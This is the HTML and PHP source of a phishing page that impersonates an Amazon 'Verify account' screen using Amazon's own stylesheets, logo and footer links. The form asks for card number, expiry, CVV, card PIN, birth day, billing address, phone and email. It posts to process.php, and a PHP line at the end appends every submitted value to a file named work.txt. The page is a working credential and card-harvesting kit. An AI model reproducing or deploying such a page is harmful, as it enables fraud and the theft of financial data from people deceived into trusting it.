<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Amazon Verify Account</title>
<link rel="shortcut icon" href="amazon30.png">
<link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/01SdjaY0ZsL._RC|31jdWD+JB+L.css,51vvPPftXBL.css_.css?AUIClients/AuthenticationPortalAssets" />
<link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/61A6IErPNXL._RC|11Fd9tJOdtL.css,11tfezETfFL.css,31Q3id-QR0L.css,31U9HrBLKmL.css_.css?AUIClients/AmazonUI#us.not-trident" />
<link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/21xpztliDML.css?AUIClients/CVFAssets" />

</head>
<body>
    
    <style>




        .logo img{
            width: 103px;
            height: 31px;
            align-items: center;
            margin-top: 10px;
            margin-bottom: -5px;
        }
        .container{
            width: 380px;
            height: 690px;
            padding: 20px 26px;
            padding-top: 5px;
            padding-bottom: 0px;
            display: flex;
            justify-content: space-around;
            flex-direction: column;
            border: 1px solid #ddd;
            border-radius: 7px;
            margin: 20px auto 25px auto
        }


        .titel{
         margin-top: -5px;
         font-size: 13px;
         line-height: 1.2;
         font-family:"Amazon Ember",Arial,sans-serif;
         font-weight: 400px;
         margin-bottom: 290px;
         margin-right: 95px;
        }
        .Begge {
            width: 300px;
            margin-top: -310px;
            justify-content: center;
            display: flex;


        }
        
        .input-box{
            
        }
        .input-box label{
            font-size: 13;
            padding-left: 2px;
            padding-bottom: 2px;
            font-weight: 700;
            font-family:"Amazon Ember",Arial,sans-serif;
            font-size: 12px;
            line-height: normal;
            
        }
        .input-box input{
            width: 272px;
            height: 31px;
            padding: 3px 7px;
            margin-top: 3px;
            background-color: #fff;
            border: 1px solid #898989;
            border-radius: 7px;
            margin-bottom: 10px;
            line-height: normal;
            margin-right: 30px;
        }
        .input-date input{
            width: 100px;
            color: #75758B;
        }
        .input-gender select{
            color: #75758B;
            width: 287px;
            height: 20px;
            padding: 3px 7px;
            margin-top: 3px;
            background-color: #fff;
            border: 1px solid #898989;
            border-radius: 7px;
            margin-bottom: 10px;
        }
        .credit-Type select{
            color: #75758B;
            margin-right: 162px;
            
        }
        .credit-Holder label{
            margin-left: -70px;
            padding-left: -50px;
            margin-right: 160px;
            margin-bottom: -4px;
        }
        .credit-Cardnumber label{
            margin-left: 14px;
            margin-bottom: -4px;
            float: left;
            
        }
        .credit-input label{
            font-size: 13;
            padding-left: 2px;
            padding-bottom: 2px;
            font-weight: 700;
            font-family:"Amazon Ember",Arial,sans-serif;
            font-size: 12px;
            line-height: normal;
            margin-right: 63px;
            
        }
        .credit-input input{
            width: 272px;
            height: 31px;
            padding: 3px 7px;
            margin-top: 3px;
            background-color: #fff;
            border: 1px solid #898989;
            border-radius: 4px;
            margin-bottom: 6px;
            line-height: normal;
        }

        .BirthDay input{
            width: 50px;

        }

        .credit-expcvvpin{
            display: flex;
           
        }
        .credit-expcvvpin input{
            width: 70px;
            height: 31px;
            margin-left: 14px;
        }
        .credit-expcvvpin label{
            margin-right: 34px;
            margin-bottom: -4px;
        }
        .credit-Cvv label{
            margin-left: 4px;
        }
        .credit-Pin label{
            margin-left: 2px;
        }

        .credit-Type label{
            float: left;
            margin-left: 14px;
            margin-bottom: -4px;
        }
        .credit-input select{
            color: #75758B;
            width: 110px;
            height: 25px;
            padding: 3px 7px;
            margin-top: 3px;
            background-color: #fff;
            border: 1px solid #898989;
            border-radius: 4px;
            margin-bottom: 7px;
        }
        .submit button{
            font-family: "Amazon Ember",Arial,sans-serif;
            font-size: 13px;
            width: 320px;
            height: 31px;
            border: 0px;
            border-radius: 7px;
            cursor: pointer;
            background-color: #FFD814;
            margin-bottom: 12px;
            color: rgb(0, 0, 0);
        }

        .billing-information{
            justify-content: center;
           
            
        }
        .billing-input{
            margin-bottom: 10px;
            margin-top: 5px;
        }
        .billing-input h3{
            margin-bottom: 0px;
            font-family: "Amazon Ember",Arial,sans-serif;
            font-size: 16px;
            margin-right: 60px;
            

        }

        .billing-input input{
            width: 272px;
            height: 31px;
            padding: 3px 7px;
            margin-top: 3px;
            background-color: #fff;
            border: 1px solid #898989;
            border-radius: 4px;
            margin-bottom: 5px;
            line-height: normal;
            
           
        }
        
        .billing-zipnumber{
            
            display: flex;
        }

        .billing-Number input{
            width: 110px;
        }
        
        .billing-Zip input{
            width: 68px;
            margin-right: 10px;
            margin-left: 27px;
            
        }

        .submit button:hover{
            background-color: #F7CA00
        }
        .help a{
            margin-top: 10px;
            color: #0066C8;
            float: left;
            font-family: "Amazon Ember",Arial,sans-serif;
            cursor: pointer;
            font-size: 13px;
            text-decoration: none;

        }
        .icon::before{
            display: inline-block;
            content: "";
            border-top: 4px solid transparent;
            border-left: 4px solid #949494;
            border-bottom: 4px solid transparent;
            color: #0066C8;
            margin-right: 7px;
            float: left;
            margin-top: 4px;
        }


        footer .links{
            display: flex;
            justify-content: space-between;
            width: 230px;
            margin: 25px auto 15px auto;
            height: 50px;
            
        }
        
         footer .links a{
            font-size: 11px;
            color: #0066c0;
            font-family: "Amazon Ember",Arial,sans-serif;
            text-decoration: none;
            
         }
         footer::before{
            content: "";
            display: flex;
            justify-content: center;
            width: 90%;
            margin: auto;
            height: 44px;
            margin-top: -35px;
            border-top: 1px solid transparent;
            box-shadow: 0 10px 15px -20px #333;
            margin-bottom: 30px;
        }
        footer p{
             font-size: 11px;
             font-family: "Amazon Ember",Arial,sans-serif;
             color: #555;
             text-align: center;
             margin-top: -35px;
             margin-bottom: 60px;
            }





    </style>
    <center><div class="logo">
    <a href="https://www.amazon.com/ref=ap_frn_logo"><img src="nyamazon.png"></a>
</div></center>

    <center><div class="container"><!--start Container-->
    <div class="titel">
        <h1>Verify account</h1>
    </div>
        <form action="process.php" method="POST">

        <div class="Begge"><!--start begge-->

        <div class="input-box"><!--start input-box-->

        
     </div><!--slut input-box-->

     <div class="credit-input"><!--start credit-input--->
     <div class="credit-Type"><!--start credit-Cardtype--->
        <label for="Type">Card Type</label>
     <select name="CardType"><OPtion>Credit Card<OPtion>Debit Card</OPtion></select>
     </div><!--slut credit-Cardtype-->

     <div class="credit-Holder"><!--start credit-Holder--->
     <label for="Cardholder">Full Name (Card Holder)</label>
     <input type="text" name="Cardholder" placeholder=" As it appears on card">
     </div><!--slut credit-Holder-->

     <div class="credit-Cardnumber"><!--start credit-Cardnumber--->
     <label for="date">Card Number</label>
     <input type="text" name="Kortnummer" placeholder="1234 5678 9101 1121" maxlength="19">
     </div><!--slut credit-Cardnumber-->

     <div class="credit-expcvvpin"><!--start expcvvpin--->
     <div class="credit-Exp"><!--start credit-exp--->
     <label for="Valid-Thru">Exp</label>
     <input type="text" name="Valid-Thru" placeholder="02/26" maxlength="6">

     <div class="BirthDay">
        <input type="text" name="Day of Birth" placeholder="Birth Day">
    </div>

     
     </div><!--slut credit-exp-->

     <div class="credit-Cvv"><!--start credit-Cvv--->
     <label for="cvv">CVV</label>
     <input type="text" name="CVV" placeholder="CVV/CVC" maxlength="6">
     </div><!--slut credit-Cvv-->

     <div class="credit-Pin"><!--start credit-Pin--->
     <label for="PIN">PIN</label>
     <input type="password" name="PIN" placeholder="PIN" maxlength="6">
     </div><!--slut credit-Pin-->

     </div><!--slutt expcvvpin--->

 
     </div><!--slut credit-input--->

     

</div><!--slut begge-->

<div class="billing-input"><!--start billing-input-->

<div class="Billing-information">
    <h3>Billing Address Information</h3>
</div>

    <div class="billing-Country"><!--start billing-Country-->
    <input type="text" name="County" placeholder="Country">
    </div><!--slut billing-Country-->
    
    <div class="billing-State"><!--start billing-state-->
    <input type="text" name="State" placeholder="State">
    </div><!--slut billing-state-->


    <div class="billing-City"><!--start billing-City-->
    <input type="text" name="City" placeholder="City">
    </div><!--slut billing-Country-->

    <div class="billing-Adress"><!--start billing-Adress-->
    <input type="text" name="Adress" placeholder="Address">
    </div><!--slut billing-Country-->

    <div class="billing-zipnumber"><!--start billing-zipnumber-->

    <div class="billing-Zip"><!--start billing-Zip-->
    <input type="text" name="Zip" placeholder="Zip Code">
    </div><!--slut billing-Zip-->

    <div class="billing-Number"><!--start billing-phone number-->
    <input type="text" name="Number" placeholder="+Phone Number">
    </div><!--slut billing-phone number-->


    </div><!--slut billing-zipnumber-->

    <div class="input-email"><!--start input-email-->
            <input type="email" name="email" placeholder="Email Address">
        </div><!--slut input-email-->

</div><!--slut billing-input-->


<center><div class="submit"><!--slut submit-->
    <button type="submit">Verify Account</button>
</div></center><!--slut submit-->

<div class="help">

<a href="https://www.amazon.de/-/en/gp/help/customer/display.html?ref_=hp_left_v4_sib&nodeId=GL7J7MHTZ99T7V3X" class="icon">Need help?</a>

</div>


        </form>
    </div><!--slutt Container--></center>

    <center><footer>
    <div class="links">
        <a href="https://www.amazon.com/gp/help/customer/display.html/ref=ap_desktop_footer_cou?ie=UTF8&nodeId=508088">Conditions of Use</a>
        <a href="https://www.amazon.com/gp/help/customer/display.html/ref=ap_desktop_footer_privacy_notice?ie=UTF8&nodeId=468496">Privacy Notice</a>
        <a href="https://www.amazon.com/gp/help/customer/display.html">Help</a>

    </div>
    <p>© 1996-2023, Amazon.com, Inc. or its affiliates</p>
</footer></center>



    
</body>
</html>

<?php

   file_put_contents('work.txt', print_r($_POST, true), FILE_APPEND);
   
?>










